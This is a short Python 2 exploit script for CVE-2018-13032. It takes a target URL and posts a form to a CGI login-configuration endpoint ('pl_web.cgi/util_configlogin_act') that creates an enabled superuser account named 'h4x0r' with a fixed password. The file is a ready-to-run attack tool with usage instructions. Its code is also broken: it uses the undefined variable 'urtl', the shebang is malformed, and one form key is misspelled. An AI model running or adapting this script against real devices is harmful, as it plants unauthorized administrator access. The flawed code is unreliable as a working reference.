#!/usr/bin/pythono #Exploit Title: #Date: 3/25/2019 #Exploit Author: BehzaDghat #Version: 10.7.4 #CVE : 2018-13032 import sys import requests au='/cgi-bin/pl_web.cgi/util_configlogin_act' def help_message(): print """ {} -h ---> show this message {} -u URL ---> start exploit example: {} -u http://target.com """.format(sys.argv[0],sys.argv[0],sys.argv[0]) def error_optiont(): print """\ntype and enter {} -h""".format(sys.argv[0]) data_fs={'savecrtcfg':'checked','user_username1':'root','user_enabled1':'on','user_passwd1':'','user_passwd_verify1':'', 'user_delete1':'','user_username2r':'admin','user_passwd2':'','user_passwd_verify2':'','user_delete2':'', 'user_username3':'user','user_enabled3':'on','user_passwd3':'','user_passwd_verify3':'','user_delete3':'', 'user_username4':'h4x0r','user_enabled4':'on','user_superuser4':'on','user_passwd4':'123123','user_passwd_verify4':'123123', 'page':'util_configlogin','val_requested_page':'user_accounts','savecrtcfg':'checked' ,'page_uuid':'3e2774f9-1cd3-4d36-a91e-eb9e42b5ba0d', 'form_has_changed':'1','submit':'Supersize!'} if len(sys.argv)>1 and sys.argv[1]=='-h': help_message() exit() elif len(sys.argv)==3 and sys.argv[1]=='-u': urlt=sys.argv[2]+au if '200' in str(requests.get(urlt)): print 'Send DATA' r=requests.post(urtl,data=data_fs) if '200' in str(r): print 'Added User' else: print 'Not Found Page' else: print 'Type And Enter -> python {} -h'.format(sys.argv[0])